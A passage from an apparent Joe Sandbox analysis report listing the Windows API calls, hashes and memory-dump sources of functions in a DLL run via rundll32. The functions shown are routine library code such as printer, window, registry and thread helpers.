                                                                                                                      • API String ID: 317715441-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                      • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                      • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                      • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                      • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                      • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                      • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                      • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                      • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                      • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                      • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                      • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                      • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
